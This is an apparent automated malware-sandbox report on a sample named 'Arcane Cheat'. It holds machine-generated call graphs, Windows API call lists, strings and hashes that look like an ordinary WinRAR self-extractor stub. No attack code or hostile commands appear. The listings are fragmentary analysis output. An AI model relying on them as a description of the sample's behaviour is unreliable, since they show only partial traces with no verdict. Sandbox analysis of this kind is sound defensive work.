24307->24308 24319 826e91 74 API calls __vswprintf_c_l 24307->24319 24309 821827 24308->24309 24315 8217e7 ___std_exception_copy 24308->24315 24312 8435de 22 API calls 24309->24312 24311 8217be 24320 826efd 75 API calls 24311->24320 24314 82182e 24312->24314 24314->24318 24322 826efd 75 API calls 24314->24322 24315->24318 24321 826efd 75 API calls 24315->24321 24318->24280 24319->24311 24320->24308 24321->24318 24322->24318 24324 82c831 __EH_prolog 24323->24324 24325 83e24a new 8 API calls 24324->24325 24327 82c874 24325->24327 24326 83e24a new 8 API calls 24328 82c898 24326->24328 24327->24326 24328->24288 24330 834415 __EH_prolog 24329->24330 24331 83e24a new 8 API calls 24330->24331 24332 834431 24331->24332 24333 827ce6 24332->24333 24335 8306ba 78 API calls 24332->24335 24333->24293 24335->24333 24337 828389 __EH_prolog 24336->24337 24365 821380 24337->24365 24339 8283a4 24373 829ef7 24339->24373 24342 8283d3 24493 821631 24342->24493 24346 82846e 24392 828517 24346->24392 24350 8284ce 24396 821f00 24350->24396 24353 8283cf 24353->24342 24353->24346 24356 82a4c6 8 API calls 24353->24356 24497 82bac4 CompareStringW 24353->24497 24354 8284d9 24354->24342 24400 823aac 24354->24400 24410 82857b 24354->24410 24356->24353 24359 82a4db 24358->24359 24360 82a4df 24359->24360 24724 82a5f4 24359->24724 24360->24294 24362 82a4ef 24362->24360 24363 82a4f4 FindClose 24362->24363 24363->24360 24364->24301 24366 821385 __EH_prolog 24365->24366 24367 82c827 8 API calls 24366->24367 24368 8213bd 24367->24368 24369 83e24a new 8 API calls 24368->24369 24372 821416 ___scrt_get_show_window_mode 24368->24372 24370 821403 24369->24370 24371 82b07d 82 API calls 24370->24371 24370->24372 24371->24372 24372->24339 24374 829f0e 24373->24374 24375 8283ba 24374->24375 24499 826f5d 76 API calls 24374->24499 24375->24342 24377 8219a6 24375->24377 24378 8219b0 __EH_prolog 24377->24378 24389 821a00 24378->24389 24391 8219e5 24378->24391 24500 82709d 24378->24500 24380 821b50 24503 826dc1 74 
API calls 24380->24503 24382 823aac 97 API calls 24385 821bb3 24382->24385 24383 821b60 24383->24382 24383->24391 24384 821bff 24390 821c32 24384->24390 24384->24391 24504 826dc1 74 API calls 24384->24504 24385->24384 24387 823aac 97 API calls 24385->24387 24387->24385 24388 823aac 97 API calls 24388->24390 24389->24380 24389->24383 24389->24391 24390->24388 24390->24391 24391->24353 24393 828524 24392->24393 24522 830c26 GetSystemTime SystemTimeToFileTime 24393->24522 24395 828488 24395->24350 24498 831359 72 API calls 24395->24498 24397 821f05 __EH_prolog 24396->24397 24399 821f39 24397->24399 24524 821951 24397->24524 24399->24354 24401 823ab8 24400->24401 24402 823abc 24400->24402 24401->24354 24403 823af7 24402->24403 24404 823ae9 24402->24404 24659 8227e8 97 API calls 3 library calls 24403->24659 24405 823b29 24404->24405 24658 823281 85 API calls 3 library calls 24404->24658 24405->24354 24408 823af5 24408->24405 24660 82204e 74 API calls 24408->24660 24411 828585 __EH_prolog 24410->24411 24412 8285be 24411->24412 24424 8285c2 24411->24424 24683 8384bd 99 API calls 24411->24683 24413 8285e7 24412->24413 24418 82867a 24412->24418 24412->24424 24414 828609 24413->24414 24413->24424 24684 827b66 151 API calls 24413->24684 24414->24424 24685 8384bd 99 API calls 24414->24685 24418->24424 24661 825e3a 24418->24661 24420 828705 24420->24424 24667 82826a 24420->24667 24423 828875 24425 82a4c6 8 API calls 24423->24425 24426 8288e0 24423->24426 24424->24354 24425->24426 24671 827d6c 24426->24671 24428 82c991 80 API calls 24431 82893b _memcmp 24428->24431 24429 828a70 24430 828b43 24429->24430 24437 828abf 24429->24437 24435 828b9e 24430->24435 24445 828b4e 24430->24445 24431->24424 24431->24428 24431->24429 24432 828a69 24431->24432 24686 828236 82 API calls 24431->24686 24687 821f94 74 API calls 24431->24687 24688 821f94 74 API calls 24432->24688 24444 828b30 24435->24444 24691 8280ea 96 API calls 24435->24691 24436 828b9c 24438 829653 79 API calls 24436->24438 24439 
82a180 4 API calls 24437->24439 24437->24444 24438->24424 24442 828af7 24439->24442 24441 829653 79 API calls 24441->24424 24442->24444 24689 829377 96 API calls 24442->24689 24443 828c09 24447 829989 GetFileType 24443->24447 24457 828c74 24443->24457 24483 8291c1 ___InternalCxxFrameHandler 24443->24483 24444->24436 24444->24443 24445->24436 24690 827f26 100 API calls ___InternalCxxFrameHandler 24445->24690 24446 82aa88 8 API calls 24449 828cc3 24446->24449 24451 828c4c 24447->24451 24452 82aa88 8 API calls 24449->24452 24451->24457 24692 821f94 74 API calls 24451->24692 24454 828cd9 24452->24454 24458 828d9c 24454->24458 24694 829b21 SetFilePointer GetLastError SetEndOfFile 24454->24694 24455 828c62 24693 827061 75 API calls 24455->24693 24457->24446 24459 828efd 24458->24459 24460 828df7 24458->24460 24464 828f23 24459->24464 24465 828f0f 24459->24465 24480 828e27 24459->24480 24461 828e69 24460->24461 24462 828e07 24460->24462 24463 82826a CharUpperW 24461->24463 24467 828e4d 24462->24467 24474 828e15 24462->24474 24468 828e84 24463->24468 24466 832c42 75 API calls 24464->24466 24469 8292e6 121 API calls 24465->24469 24470 828f3c 24466->24470 24467->24480 24696 827907 108 API calls 24467->24696 24476 828eb4 24468->24476 24477 828ead 24468->24477 24468->24480 24469->24480 24699 8328f1 121 API calls 24470->24699 24695 821f94 74 API calls 24474->24695 24698 829224 94 API calls __EH_prolog 24476->24698 24697 827698 84 API calls ___InternalCxxFrameHandler 24477->24697 24484 82904b 24480->24484 24700 821f94 74 API calls 24480->24700 24482 829156 24482->24483 24485 82a444 4 API calls 24482->24485 24483->24441 24484->24482 24484->24483 24486 829104 24484->24486 24677 829ebf SetEndOfFile 24484->24677 24487 8291b1 24485->24487 24678 829d62 24486->24678 24487->24483 24701 821f94 74 API calls 24487->24701 24490 82914b 24492 8296d0 75 API calls 24490->24492 24492->24482 24494 821643 24493->24494 24716 82c8ca 24494->24716 24497->24353 24498->24350 24499->24375 24505 8216d2 
                                  APIs
                                    • Part of subcall function 008300CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008300E4
                                    • Part of subcall function 008300CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008300F6
                                    • Part of subcall function 008300CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00830127
                                    • Part of subcall function 00839DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00839DAC
                                    • Part of subcall function 0083A335: OleInitialize.OLE32(00000000), ref: 0083A34E
                                    • Part of subcall function 0083A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0083A385
                                    • Part of subcall function 0083A335: SHGetMalloc.SHELL32(00868430), ref: 0083A38F
                                    • Part of subcall function 008313B3: GetCPInfo.KERNEL32(00000000,?), ref: 008313C4
                                    • Part of subcall function 008313B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008313D8
                                  • GetCommandLineW.KERNEL32 ref: 0083D61C
                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0083D643
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0083D654
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0083D68E
                                    • Part of subcall function 0083D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0083D29D
                                    • Part of subcall function 0083D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0083D2D9
                                  • CloseHandle.KERNEL32(00000000), ref: 0083D697
                                  • GetModuleFileNameW.KERNEL32(00000000,0087DC90,00000800), ref: 0083D6B2
                                  • SetEnvironmentVariableW.KERNEL32(sfxname,0087DC90), ref: 0083D6BE
                                  • GetLocalTime.KERNEL32(?), ref: 0083D6C9
                                  • _swprintf.LIBCMT ref: 0083D708
                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0083D71A
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0083D721
                                  • LoadIconW.USER32(00000000,00000064), ref: 0083D738
                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0083D789
                                  • Sleep.KERNEL32(?), ref: 0083D7B7
                                  • DeleteObject.GDI32 ref: 0083D7F0
                                  • DeleteObject.GDI32(?), ref: 0083D800
                                  • CloseHandle.KERNEL32 ref: 0083D843
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                  • API String ID: 788466649-3743209390

                                  APIs
                                  • FindResourceW.KERNEL32(0083AE4D,PNG,?,?,?,0083AE4D,00000066), ref: 00839E2E
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0083AE4D,00000066), ref: 00839E46
                                  • LoadResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E59
                                  • LockResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E64
                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0083AE4D,00000066), ref: 00839E82
                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0083AE4D,00000066), ref: 00839E93
                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00839EFC
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00839F1B
                                  • GlobalFree.KERNEL32(00000000), ref: 00839F22
                                  Similarity
                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                  • String ID: PNG
                                  • API String ID: 4097654274-364855578

                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A628
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A65E
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A66A
                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A692
                                  • GetLastError.KERNEL32(?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A69E
                                  Similarity
                                  • API ID: FileFind$ErrorFirstLast$Next
                                  • String ID:
                                  • API String ID: 869497890-0
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002,00000000), ref: 0084755E
                                  • TerminateProcess.KERNEL32(00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002,00000000), ref: 00847565
                                  • ExitProcess.KERNEL32 ref: 00847577
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  APIs
                                  Similarity
                                  • API ID: H_prolog_memcmp
                                  • String ID:
                                  • API String ID: 3004599000-0
                                  • Opcode ID: e2ff427b803a6b4fa23bd00fcd48bc4e57e8148c4559b13d632351c3768670a1
                                  • Instruction ID: fcfbe094fa65f8594a9eea66d6c68ee47986bfda0bb08d39fe102d8e4fd74e08
                                  • Opcode Fuzzy Hash: e2ff427b803a6b4fa23bd00fcd48bc4e57e8148c4559b13d632351c3768670a1
                                  • Instruction Fuzzy Hash: E882F970905265EEDF25DB64D885BFAB7A9FF15300F0840B9E899DB142DB305AC8CB61
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083AEE5
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  Similarity
                                  • API ID: H_prologItemTextWindow
                                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp

                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 008300E4
                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008300F6
                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00830127
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008303D4
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008303F0
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00830402
                                  • ReadFile.KERNEL32(00000000,?,00007FFE,00853BA4,00000000), ref: 00830421
                                  • CloseHandle.KERNEL32(00000000), ref: 00830479
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083048F
                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008304E7
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00830510
                                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0083054A
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • _swprintf.LIBCMT ref: 008305BE
                                  • _swprintf.LIBCMT ref: 0083060A
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • AllocConsole.KERNEL32 ref: 00830612
                                  • GetCurrentProcessId.KERNEL32 ref: 0083061C
                                  • AttachConsole.KERNEL32(00000000), ref: 00830623
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00830649
                                  • WriteConsoleW.KERNEL32(00000000), ref: 00830650
                                  • Sleep.KERNEL32(00002710), ref: 0083065B
                                  • FreeConsole.KERNEL32 ref: 00830661
                                  • ExitProcess.KERNEL32 ref: 00830669
                                  Similarity
                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll

                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083BDFA
                                    • Part of subcall function 0083AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0083AAFE
                                  • SetWindowTextW.USER32(?,?), ref: 0083C127
                                  • _wcsrchr.LIBVCRUNTIME ref: 0083C2B1
                                  • GetDlgItem.USER32(?,00000066), ref: 0083C2EC
                                  • SetWindowTextW.USER32(00000000,?), ref: 0083C2FC
                                  • SendMessageW.USER32(00000000,00000143,00000000,0086A472), ref: 0083C30A
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0083C335
                                  Similarity
                                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion

                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0082D346
                                  • _wcschr.LIBVCRUNTIME ref: 0082D367
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0082D328,?), ref: 0082D382
                                  • __fprintf_l.LIBCMT ref: 0082D873
                                    • Part of subcall function 0083137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0082B652,00000000,?,?,?,00010450), ref: 00831396
                                  Similarity
                                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a

                                  APIs
                                    • Part of subcall function 0083AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                    • Part of subcall function 0083AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                    • Part of subcall function 0083AC74: IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                    • Part of subcall function 0083AC74: TranslateMessage.USER32(?), ref: 0083ACB8
                                    • Part of subcall function 0083AC74: DispatchMessageW.USER32(?), ref: 0083ACC2
                                  • GetDlgItem.USER32(00000068,0087ECB0), ref: 0083CB6E
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0083A632,00000001,?,?,0083AECB,00854F88,0087ECB0), ref: 0083CB96
                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0083CBA1
                                  • SendMessageW.USER32(00000000,000000C2,00000000,008535B4), ref: 0083CBAF
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0083CBC5
                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0083CBDF
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0083CC23
                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0083CC31
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0083CC40
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0083CC67
                                  • SendMessageW.USER32(00000000,000000C2,00000000,0085431C), ref: 0083CC76
                                  Similarity
                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                  • String ID: \

                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 0083CF54
                                  • ShowWindow.USER32(?,00000000), ref: 0083CF93
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0083CFCF
                                  • CloseHandle.KERNEL32(?), ref: 0083CFF5
                                  • ShowWindow.USER32(?,00000001), ref: 0083D084
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  Similarity
                                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                  • String ID: $.exe$.inf

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00844E35,00844E35,?,?,?,0084A2A9,00000001,00000001,3FE85006), ref: 0084A0B2
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0084A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0084A138
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0084A232
                                  • __freea.LIBCMT ref: 0084A23F
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • __freea.LIBCMT ref: 0084A248
                                  • __freea.LIBCMT ref: 0084A26D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  • Opcode ID: 6f41c441d2c53eaf8f59899e92d387e5a48c6687e2fe66a4e02e688369851590
                                  • Instruction ID: 7568e7fb4011779d7c44d145fd93378d4bfed927df3f8160646987fa5d084182
                                  • Opcode Fuzzy Hash: 6f41c441d2c53eaf8f59899e92d387e5a48c6687e2fe66a4e02e688369851590
                                  • Instruction Fuzzy Hash: CA51B07269022EAFEB298F64CC81EBF77A9FB44750F154229FC05DA140EB75DC40D6A2

                                  APIs
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • OleInitialize.OLE32(00000000), ref: 0083A34E
                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0083A385
                                  • SHGetMalloc.SHELL32(00868430), ref: 0083A38F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                  • String ID: riched20.dll$3To
                                  • API String ID: 3498096277-2168385784
                                  • Opcode ID: 84b3320ae23ac64654da61bf6c30c0d95c41c0c1a02c205f78f64daffdfb4736
                                  • Instruction ID: 82213f39c5e8840ce2c7f8063fc35049737fb999e6c0476efd8a0197f2a36a6a
                                  • Opcode Fuzzy Hash: 84b3320ae23ac64654da61bf6c30c0d95c41c0c1a02c205f78f64daffdfb4736
                                  • Instruction Fuzzy Hash: 0FF0F9B1D0020AABDB10AF9AD8499EFFBFCFF95705F00415AE814E2240DBB856458FA1

                                  APIs
                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008278AD,?,00000005,?,00000011), ref: 00829A4C
                                  • GetLastError.KERNEL32(?,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829A59
                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008278AD,?,00000005,?), ref: 00829A8E
                                  • GetLastError.KERNEL32(?,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829A96
                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829ADB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$CreateErrorLast$Time
                                  • String ID:
                                  • API String ID: 1999340476-0
                                  • Opcode ID: 62344c54b672d4024c82e5c94fb68782a2a2fa894465e863f4bce4ab51ff4452
                                  • Instruction ID: f813dfe120070d4de434a151bef9335e9528159069e175b0871a867377a49ea1
                                  • Opcode Fuzzy Hash: 62344c54b672d4024c82e5c94fb68782a2a2fa894465e863f4bce4ab51ff4452
                                  • Instruction Fuzzy Hash: 86417870544B656FE7209B24EC05BDABBE4FB01324F100719F9E5D61D1E378A9C8CBA2

                                  APIs
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                  • IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                  • TranslateMessage.USER32(?), ref: 0083ACB8
                                  • DispatchMessageW.USER32(?), ref: 0083ACC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Message$DialogDispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 1266772231-0
                                  • Opcode ID: 65bd48f7ce20186a00eeb77b611fc67e0edb67b5d8e5f552a4b88c0d851c08ff
                                  • Instruction ID: 237a4d2a29d3f86c3eb2649a8a8b623a797d4539541abfb90b5e367fbe1a9d76
                                  • Opcode Fuzzy Hash: 65bd48f7ce20186a00eeb77b611fc67e0edb67b5d8e5f552a4b88c0d851c08ff
                                  • Instruction Fuzzy Hash: 47F0D071D02129AB8B209BE5DC4CDEB7FACFF052917404515F919D2110EB34D506CBF1

                                  APIs
                                  • GetClassNameW.USER32(?,?,00000050), ref: 0083A2DE
                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 0083A315
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0083A305
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                  • String ID: EDIT
                                  • API String ID: 4243998846-3080729518
                                  • Opcode ID: 74b21d27d6a60eea48ea7fb9ea58d21d82ed3fff6aa9a3e71f3afe7630d41dc4
                                  • Instruction ID: cbc968d91a82ac8e6ff7991bb2eaa4c49d2a56e0c199006a6c7de47dfcb853b7
                                  • Opcode Fuzzy Hash: 74b21d27d6a60eea48ea7fb9ea58d21d82ed3fff6aa9a3e71f3afe7630d41dc4
                                  • Instruction Fuzzy Hash: 2AF0A732A0162877E73096689C09FEB77ACFF86B11F440156BE45E2280D760AD45C6F7

                                  APIs
                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0083D29D
                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0083D2D9
                                  Strings
